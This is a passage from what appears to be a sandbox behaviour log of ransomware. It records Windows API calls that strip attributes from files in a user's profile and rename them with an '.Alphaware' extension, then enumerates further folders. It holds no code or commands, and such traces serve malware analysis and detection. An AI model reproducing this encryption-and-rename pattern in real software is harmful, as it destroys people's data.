ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7a040, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x2e2)) returned 1 [0100.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e1a9b00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4b4)) returned 1 [0100.521] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.alphaware")) returned 1 [0100.524] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk", dwFileAttributes=0x80) returned 1 [0100.526] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), fInfoLevelId=0x0, lpFileInformation=0x25a5550 | out: lpFileInformation=0x25a5550*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79b34fb0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7a040, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5df)) returned 1 [0100.556] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79b34fb0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e21bf20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8a0)) returned 1 [0100.556] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.alphaware")) returned 1 [0100.557] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk", dwFileAttributes=0x80) returned 1 [0100.558] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2428c68 | out: lpFileInformation=0x2428c68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a)) returned 1 [0100.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e2681e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x7a0)) returned 1 [0100.588] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.alphaware")) returned 1 [0100.591] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini", dwFileAttributes=0x80) returned 1 [0100.591] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x24ad4f0 | out: lpFileInformation=0x24ad4f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e84ec60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0100.618] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e2b44a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4)) returned 1 [0100.618] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.alphaware")) returned 1 [0100.624] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini", dwFileAttributes=0x80) returned 1 [0100.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2531780 | out: lpFileInformation=0x2531780*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e)) returned 1 [0100.651] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e300760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x274)) returned 1 [0100.651] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.alphaware")) returned 1 [0100.670] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk", dwFileAttributes=0x80) returned 1 [0100.674] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25b4b48 | out: lpFileInformation=0x25b4b48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106)) returned 1 [0100.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e398ce0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x234)) returned 1 [0100.708] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.alphaware")) returned 1 [0100.722] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini", dwFileAttributes=0x80) returned 1 [0100.723] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2434c08 | out: lpFileInformation=0x2434c08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e84c550, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0100.751] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e40b100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4)) returned 1 [0100.751] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.alphaware")) returned 1 [0100.758] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg", dwFileAttributes=0x80) returned 1 [0100.759] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), fInfoLevelId=0x0, lpFileInformation=0x24bb270 | out: lpFileInformation=0x24bb270*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x3a38c740, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x9cfab)) returned 1 [0100.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e4ef940, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd15b4)) returned 1 [0100.856] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.alphaware")) returned 1 [0100.861] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\themes\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8e515aa0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8e515aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.861] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.862] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.864] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.864] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.865] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.865] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.866] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.867] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.867] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.868] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Sun\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\sun\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.869] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.870] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Sun\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\sun\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.870] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.871] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Sun\\Java\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\sun\\java\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.872] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.873] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Sun\\Java\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\sun\\java\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.873] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.874] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\sun\\java\\deployment\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.874] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.875] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\sun\\java\\deployment\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0100.875] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0100.877] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0100.878] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0xd85a10 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0100.886] CoTaskMemFree (pv=0xd85a10) [0100.886] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x23e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0100.886] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*" (normalized: "c:\\users\\public\\documents\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, 